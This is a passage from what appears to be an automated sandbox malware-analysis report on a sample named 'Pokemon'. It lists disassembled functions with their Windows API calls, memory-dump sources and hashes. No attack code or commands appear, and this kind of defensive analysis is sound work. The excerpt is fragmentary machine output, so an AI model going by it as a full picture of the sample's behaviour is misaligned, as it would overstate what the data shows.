                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4127811313-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 0836a3d91cdd94a74edc4c1d1ba064d9cb3aed7c430a8c0a25c094c3da20db96
                                                                                                                                                                                                                                                                                      • Instruction ID: 7ed5073baf145049ab58f231bebe1600ecc22488839e4107c46db4ecee2fb0cc
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0836a3d91cdd94a74edc4c1d1ba064d9cb3aed7c430a8c0a25c094c3da20db96
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A114C35A0112AFBDF10DFA4D9459EE77B8EB05344F100452F902E3241D770BE92DBA6
                                                                                                                                                                                                                                                                                      Function 000FEAED Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 000FEB14
                                                                                                                                                                                                                                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 000FEB47
                                                                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 000FEB5D
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 000FEB64
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2880819207-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 23da8d54a263f00cc86ba9488dc9bfc9faaf4043a221d4a9d440a81e7afa23fd
                                                                                                                                                                                                                                                                                      • Instruction ID: b947634b642b4af47833fc97a26b2dcff1fe33f8dee0c1ceb4eb891d61d4e5b5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23da8d54a263f00cc86ba9488dc9bfc9faaf4043a221d4a9d440a81e7afa23fd
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B110872900258BFC7119BA8DC05ADF7FADBB45310F144256F915D3BA0D7B4894487A0
                                                                                                                                                                                                                                                                                      Function 000BD53C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,?,000BD369,00000000,00000004,00000000), ref: 000BD588
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 000BD594
                                                                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 000BD59B
                                                                                                                                                                                                                                                                                      • ResumeThread.KERNEL32(00000000), ref: 000BD5B9
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 173952441-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 6d01a83adf35a9051459ff2c2b30fd507400e5620bddd941695a233b3130bd6a
                                                                                                                                                                                                                                                                                      • Instruction ID: 14a9a2d3fb81d3cd89e45f709525c364f80d1d8dac54b422338ae2f58637d636
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d01a83adf35a9051459ff2c2b30fd507400e5620bddd941695a233b3130bd6a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D01D272404614BBCB306FA5EC05BEEBBA8EF81734F20021BF925871E1EB709951C6A1
                                                                                                                                                                                                                                                                                      Function 00097873 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 000978B1
                                                                                                                                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 000978C5
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 000978CF
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3970641297-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 139249de3aa8e563d40bd8d6ba4b1d93158eee66fe437cc42cc87868cade8f0e
                                                                                                                                                                                                                                                                                      • Instruction ID: 68ee6439812268b08074a185cf841dc965264ac15b93fb1c79de31f6a65d40af
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 139249de3aa8e563d40bd8d6ba4b1d93158eee66fe437cc42cc87868cade8f0e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D5118B73505548BFDF225F90DC58EEB7BA9FF08368F040116FA0952160DB359CA0EBA0
                                                                                                                                                                                                                                                                                      Function 000C33E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,000C338D,00000364,00000000,00000000,00000000,?,000C35FE,00000006,FlsSetValue), ref: 000C3418
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,000C338D,00000364,00000000,00000000,00000000,?,000C35FE,00000006,FlsSetValue,00133260,FlsSetValue,00000000,00000364,?,000C31B9), ref: 000C3424
                                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,000C338D,00000364,00000000,00000000,00000000,?,000C35FE,00000006,FlsSetValue,00133260,FlsSetValue,00000000), ref: 000C3432
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 5297127ec0696aa75df15744989c2e959be9aa54682af9632de98466509276e4
                                                                                                                                                                                                                                                                                      • Instruction ID: a4f9c1e82e20076d58ee56f70fa925e7998502b152649ae3d99bed23c2c43df6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5297127ec0696aa75df15744989c2e959be9aa54682af9632de98466509276e4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6101D032621222ABCB775B79EC44F5F7B98BF05B617214628F906D7540D730ED52C6E0
                                                                                                                                                                                                                                                                                      Function 000FBA6F Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,000FB69A,?,00008000), ref: 000FBA8B
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,000FB69A,?,00008000), ref: 000FBAB0
                                                                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,000FB69A,?,00008000), ref: 000FBABA
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,000FB69A,?,00008000), ref: 000FBAED
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2875609808-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 49d995cc55feae476ccec4a1e8ee9dd161648f1fb6207849a9c01d8532f34659
                                                                                                                                                                                                                                                                                      • Instruction ID: 9845a89d797ac268c9f69317e3a2cd52e32e6096fe4919c0c6396605a08c5ea3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 49d995cc55feae476ccec4a1e8ee9dd161648f1fb6207849a9c01d8532f34659
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40118E30D0062DE7DF10EFE5E9486FEBB78BF09711F110085D641B2940DB308661DB66
                                                                                                                                                                                                                                                                                      Function 0012886F Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0012888E
                                                                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 001288A6
                                                                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 001288CA
                                                                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 001288E5
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 357397906-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 468e1e315b462bc8e129f073128a91a97ff1e74e52dc843a6a6b51ee31179820
                                                                                                                                                                                                                                                                                      • Instruction ID: be39df4a24e0923b86ac46b5a56207ba1e01056d92bfc6f36bab302a9eaea4cd
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 468e1e315b462bc8e129f073128a91a97ff1e74e52dc843a6a6b51ee31179820
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 411142B9D00209EFDB51CFA8D884AEEBBF5FB08310F508166E915E3650D735AAA5CF50
                                                                                                                                                                                                                                                                                      Function 000F36F4 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 000F3712
                                                                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 000F3723
                                                                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 000F372A
                                                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 000F3731
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2710830443-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 7852650ec5176d74cd2b7a4dcc0f5e39032f7a223bc07bd9d5485ff547e9c40a
                                                                                                                                                                                                                                                                                      • Instruction ID: 6a5ea7537d8171ecd8966b1b7e4e320d1ff928372cb3a351fc5a95936755100a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7852650ec5176d74cd2b7a4dcc0f5e39032f7a223bc07bd9d5485ff547e9c40a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6FE06DB11052287ADA3027A2EC4EEFB7F6CDB42BB1F500015F605D2880DAA4C981E6B0
                                                                                                                                                                                                                                                                                      Function 001292BF Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00091F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00091F87
                                                                                                                                                                                                                                                                                        • Part of subcall function 00091F2D: SelectObject.GDI32(?,00000000), ref: 00091F96
                                                                                                                                                                                                                                                                                        • Part of subcall function 00091F2D: BeginPath.GDI32(?), ref: 00091FAD
                                                                                                                                                                                                                                                                                        • Part of subcall function 00091F2D: SelectObject.GDI32(?,00000000), ref: 00091FD6
                                                                                                                                                                                                                                                                                      • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 001292E3
                                                                                                                                                                                                                                                                                      • LineTo.GDI32(?,?,?), ref: 001292F0
                                                                                                                                                                                                                                                                                      • EndPath.GDI32(?), ref: 00129300
                                                                                                                                                                                                                                                                                      • StrokePath.GDI32(?), ref: 0012930E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1539411459-0
                                                                                                                                                                                                                                                                                      • Opcode ID: f2c0b8a2d4ca3edbfd24c987122fc40b6b947b5c57d3abffca09c228ae61dc69
                                                                                                                                                                                                                                                                                      • Instruction ID: e6bdaa6ebdb616f53baa15a3754ab6f44ac3ac7db617e616bdd140c6cc0dc8e8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f2c0b8a2d4ca3edbfd24c987122fc40b6b947b5c57d3abffca09c228ae61dc69
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6F0FE32105669BADB225F54FC0EFCE3F69AF0A324F048100FA15654F2C7B555B29BA9
                                                                                                                                                                                                                                                                                      Function 000921A0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetSysColor.USER32(00000008), ref: 000921BC
                                                                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,?), ref: 000921C6
                                                                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 000921D9
                                                                                                                                                                                                                                                                                      • GetStockObject.GDI32(00000005), ref: 000921E1
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Color$ModeObjectStockText
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4037423528-0
                                                                                                                                                                                                                                                                                      • Opcode ID: f252e3697bac9426d705812385d7dbea6f1d9f57b36e21237be7d4ef39c73f6b
                                                                                                                                                                                                                                                                                      • Instruction ID: bc4f5fc5450b8361827184ed4081a15f635b64217e421d7067118c056760481e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f252e3697bac9426d705812385d7dbea6f1d9f57b36e21237be7d4ef39c73f6b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FCE06531240640BADB715B74FC097E83B61AB11335F14821AF7B5545E0C77186A19B11
                                                                                                                                                                                                                                                                                      Function 000EEC36 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 000EEC36
                                                                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 000EEC40
                                                                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 000EEC60
                                                                                                                                                                                                                                                                                      • ReleaseDC.USER32(?), ref: 000EEC81
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 07911f30c767112f72e20971a0c932a98fee1d52938ad921a93f981a5c801cb1
                                                                                                                                                                                                                                                                                      • Instruction ID: f73ca402af86c58304f06540995bc8b4ffede10c4e7426e9db9a3d3a9a4af07c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 07911f30c767112f72e20971a0c932a98fee1d52938ad921a93f981a5c801cb1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8EE04F70C00204EFCF609FA0E908A5DBBB5FB08310F208419F80AE3650C7385993EF44
                                                                                                                                                                                                                                                                                      Function 000EEC4A Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 000EEC4A
                                                                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 000EEC54
                                                                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 000EEC60
                                                                                                                                                                                                                                                                                      • ReleaseDC.USER32(?), ref: 000EEC81
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                      • Opcode ID: fb6f9547597a285d69be04cbf172df3a3ad4111422d692c204f24fcaea2655b0
                                                                                                                                                                                                                                                                                      • Instruction ID: 38daf2a87772537a8e256e1e06848057f1c6034741e610ed4c7124bd8b8708ad
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fb6f9547597a285d69be04cbf172df3a3ad4111422d692c204f24fcaea2655b0
